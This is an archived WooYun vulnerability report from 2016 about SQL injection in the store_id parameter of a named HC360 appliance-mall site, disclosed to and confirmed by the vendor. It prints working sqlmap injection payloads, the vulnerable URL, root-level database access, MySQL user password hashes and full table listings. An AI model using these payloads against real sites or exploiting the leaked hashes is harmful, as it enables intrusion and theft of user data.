当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172428

漏洞标题:慧聪某站点存在SQL注入漏洞涉及2W+条用户数据

相关厂商:慧聪网

漏洞作者: pudding2

提交时间:2016-01-24 22:10

修复时间:2016-03-08 21:29

公开时间:2016-03-08 21:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-24: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经确认,细节仅向厂商公开
2016-02-04: 细节向核心白帽子及相关领域专家公开
2016-02-14: 细节向普通白帽子公开
2016-02-24: 细节向实习白帽子公开
2016-03-08: 细节向公众公开

简要描述:

慧聪某站点存在SQL注入漏洞,涉及2W+条用户数据

详细说明:

慧聪家电城存在SQL注入漏洞,涉及27033条用户数据
漏洞URL:http://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B
注入点:store_id

sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:
---
Parameter: store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=show_store&store_id=-6061 OR 1964=1964#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=show_store&store_id=-6061 OR 1964=1964#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'jdmall'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=show_store&store_id=-6061 OR 1964=1964#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
database management system users [11]:
[*] ''@'hcjdc'
[*] ''@'localhost'
[*] 'bj001'@'192.168.50.167'
[*] 'bj001'@'192.168.60.%'
[*] 'bj001'@'192.168.70.250'
[*] 'root'@'127.0.0.1'
[*] 'root'@'hcjdc'
[*] 'root'@'localhost'
[*] 'test2'@'localhost'
[*] 'wangheng2'@'%'
[*] 'wangheng2'@'58.252.73.135'
database management system users password hashes:
[*] bj001 [2]:
password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
password hash: NULL
[*] root [2]:
password hash: *68A0D0586406B0933796F17C337E99BB02E07788
password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
[*] test2 [1]:
password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA
[*] wangheng2 [2]:
password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA
password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F


数据库和表:

back-end DBMS: MySQL 5
Database: hcjdmjcrm
[46 tables]
+---------------------------------------+
| crm_attendplace |
| crm_contact |
| crm_contract |
| crm_contract_attachment |
| crm_customer |
| crm_customer_industryissue |
| crm_customer_offlineactivity |
| crm_customer_spreadproject |
| crm_dealrecord |
| crm_follow |
| crm_industryissue |
| crm_invoice |
| crm_offlineactivity |
| crm_offlineactivityinviterecord |
| crm_order |
| crm_order_details |
| crm_product |
| crm_product_category |
| crm_receive |
| crm_spreadproject |
| crm_supplier |
| crm_supplierdealdetail |
| hr_department |
| hr_employee |
| hr_position |
| hr_post |
| param_city |
| param_sysparam |
| param_sysparam_type |
| personal_calendar |
| personal_notes |
| public_news |
| public_notice |
| sys_app |
| sys_authority |
| sys_button |
| sys_data_authority |
| sys_info |
| sys_log |
| sys_log_err |
| sys_menu |
| sys_online |
| sys_role |
| sys_role_emp |
| temp |
| tool_batch |
+---------------------------------------+
Database: jdmall
[196 tables]
+---------------------------------------+
| base_appendproperty |
| base_appendpropertyinstance |
| base_button |
| base_file |
| base_log |
| base_month |
| base_notice |
| base_o_a_setup |
| base_organization |
| base_recyclebin |
| base_roleright |
| base_roles |
| base_stafforganize |
| base_sysloginlog |
| base_sysmenu |
| base_usergroup |
| base_usergroupright |
| base_userinfo |
| base_userinfousergroup |
| base_userright |
| base_userrole |
| jd_account_log |
| jd_ad |
| jd_ad_custom |
| jd_ad_position |
| jd_admin_action |
| jd_admin_log |
| jd_admin_message |
| jd_admin_user |
| jd_adsense |
| jd_affiliate_log |
| jd_agency |
| jd_area_region |
| jd_article |
| jd_article_cat |
| jd_attribute |
| jd_auction_log |
| jd_auto_manage |
| jd_back_goods |
| jd_back_order |
| jd_bonus_log |
| jd_bonus_price |
| jd_bonus_type |
| jd_booking_goods |
| jd_brand |
| jd_brand_cat |
| jd_brand_copy |
| jd_cancel_goods_log |
| jd_card |
| jd_cart |
| jd_cat_recommend |
| jd_category |
| jd_category1 |
| jd_category2 |
| jd_check_log |
| jd_collect_goods |
| jd_comment |
| jd_compare_log |
| jd_crons |
| jd_delivery_goods |
| jd_delivery_order |
| jd_delivery_order_remark |
| jd_email_list |
| jd_email_sendlist |
| jd_entrust |
| jd_entrust_log |
| jd_error_log |
| jd_exchange_goods |
| jd_favourable_activity |
| jd_feedback |
| jd_free_sample |
| jd_friend_link |
| jd_goods |
| jd_goods_activity |
| jd_goods_article |
| jd_goods_attr |
| jd_goods_attr_log |
| jd_goods_cat |
| jd_goods_gallery |
| jd_goods_log |
| jd_goods_price_log |
| jd_goods_type |
| jd_goods_unit |
| jd_grab_address |
| jd_grab_area |
| jd_grab_site_info |
| jd_group_goods |
| jd_hc360_category |
| jd_house_cat |
| jd_keywords |
| jd_link_goods |
| jd_login_log_0 |
| jd_login_log_1 |
| jd_login_log_2 |
| jd_login_log_3 |
| jd_login_log_4 |
| jd_login_log_5 |
| jd_login_log_6 |
| jd_login_log_7 |
| jd_login_log_8 |
| jd_login_log_9 |
| jd_logistics |
| jd_mail_templates |
| jd_member_price |
| jd_mmt_shop_info |
| jd_mmt_shop_info_copy |
| jd_nav |
| jd_order_action |
| jd_order_goods |
| jd_order_info |
| jd_order_logistics |
| jd_pack |
| jd_package_goods |
| jd_pay_log |
| jd_payment |
| jd_plugins |
| jd_priceoff_activity |
| jd_priceoff_activity_log |
| jd_priceoff_goods |
| jd_products |
| jd_provider |
| jd_provider_product |
| jd_recommend_list |
| jd_reconciliation |
| jd_refund_goods |
| jd_refund_orders |
| jd_reg_confirm_log |
| jd_reg_extend_info |
| jd_reg_fields |
| jd_reg_sms_log |
| jd_region |
| jd_region_bak |
| jd_retailer_info |
| jd_role |
| jd_salesupport_request |
| jd_salesupport_response |
| jd_search_log |
| jd_searchengine |
| jd_server_edit_log |
| jd_server_info |
| jd_server_information |
| jd_server_logistics |
| jd_sessions |
| jd_sessions_data |
| jd_shield_city |
| jd_shipping |
| jd_shipping_area |
| jd_shop |
| jd_shop_cat |
| jd_shop_company_info |
| jd_shop_company_info_bat |
| jd_shop_config |
| jd_sms_extend_user |
| jd_sms_log |
| jd_snatch_log |
| jd_stats |
| jd_supplier_info |
| jd_suppliers |
| jd_tag |
| jd_template |
| jd_topic |
| jd_touch_activity |
| jd_touch_ad |
| jd_touch_ad_position |
| jd_touch_adsense |
| jd_touch_article |
| jd_touch_article_cat |
| jd_touch_auth |
| jd_touch_brand |
| jd_touch_category |
| jd_touch_feedback |
| jd_touch_goods |
| jd_touch_goods_activity |
| jd_touch_nav |
| jd_touch_payment |
| jd_touch_shop_config |
| jd_touch_topic |
| jd_touch_user_info |
| jd_user_account |
| jd_user_address |
| jd_user_bonus |
| jd_user_card_info |
| jd_user_feed |
| jd_user_key |
| jd_user_rank |
| jd_user_white_list |
| jd_users |
| jd_users_new |
| jd_virtual_card |
| jd_volume_price |
| jd_volume_price_log |
| jd_vote |
| jd_vote_log |
| jd_vote_option |
| jd_voucher |
| jd_wholesale |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+


用户表数据总共:27033条

5.jpg

漏洞证明:

6.jpg


7.jpg

修复方案:

过滤

版权声明:转载请注明来源 pudding2@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-25 10:57

厂商回复:

谢谢您。

最新状态:

暂无